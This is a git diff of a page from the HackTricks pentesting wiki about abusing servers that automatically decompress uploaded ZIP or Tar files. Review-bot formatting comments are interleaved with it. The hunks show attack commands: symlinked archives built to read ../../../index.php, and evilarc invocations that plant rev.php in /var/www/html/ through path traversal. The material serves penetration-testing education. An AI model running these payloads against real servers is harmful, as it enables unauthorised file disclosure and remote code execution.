mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [#2892] update
parent
4015277646
commit
316bcad4b2
1 changed files with 5 additions and 3 deletions
|
@ -169,7 +169,7 @@ Here’s a top 10 list of things that you can achieve by uploading (from [link](
|
||||||
|
|
||||||
Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
|
Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
|
||||||
|
|
||||||
## Zip File Automatically decompressed Upload
|
## Zip/Tar File Automatically decompressed Upload
|
||||||
|
|
||||||
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
|
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
|
||||||
|
|
||||||
|
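Review bot: The retitled heading "## Zip/Tar File Automatically decompressed Upload" now promises Tar coverage, but the unchanged sentence directly below it still reads "If you can upload a ZIP that is going to be decompressed inside the server", so the section body never mentions Tar. Suggest changing that sentence to cover both archive types in the same commit. The heading's capitalisation is also inconsistent ("Automatically decompressed Upload") and could be normalised while the line is being touched.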
@ -180,6 +180,7 @@ Upload a link containing soft links to other files, then, accessing the decompre
|
||||||
```
|
```
|
||||||
ln -s ../../../index.php symindex.txt
|
ln -s ../../../index.php symindex.txt
|
||||||
zip --symlinks test.zip symindex.txt
|
zip --symlinks test.zip symindex.txt
|
||||||
|
tar -cvf test.tar symindex.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
### Decompress in different folders
|
### Decompress in different folders
|
||||||
|
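Review bot: The added `tar -cvf test.tar symindex.txt` line is placed right after `zip --symlinks test.zip symindex.txt` in the same fence with nothing marking it as an alternative, so it reads as a third sequential step rather than the Tar variant of the same thing. Suggest a one-line comment above it (or a separate block) saying it is the tar equivalent and whether tar needs any counterpart to zip's `--symlinks` flag. The fence itself has no language tag; `bash` would fit both the existing and the added commands.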
@ -188,10 +189,11 @@ The decompressed files will be created in unexpected folders.
|
||||||
|
|
||||||
One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
|
One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
|
||||||
|
|
||||||
An automated exploit to create this kind of files can be found here: [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
|
An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)****
|
||||||
|
|
||||||
```python
|
```python
|
||||||
python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
|
python2 evilarc.py -h
|
||||||
|
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
|
||||||
```
|
```
|
||||||
|
|
||||||
Some python code to create a malicious zip:
|
Some python code to create a malicious zip:
|
||||||
|
|
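Review bot: The rewritten link line ends with a stray `****` after the closing parenthesis, which is an empty bold span left over from the editor and should be dropped. In the same hunk the fence is still tagged `python` although both lines inside it (`python2 evilarc.py -h` and the `python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php` invocation) are shell commands, so `bash` is the right tag. The switch from `python` to `python2` is also unexplained; a short sentence before the block stating the interpreter requirement would tell the reader why.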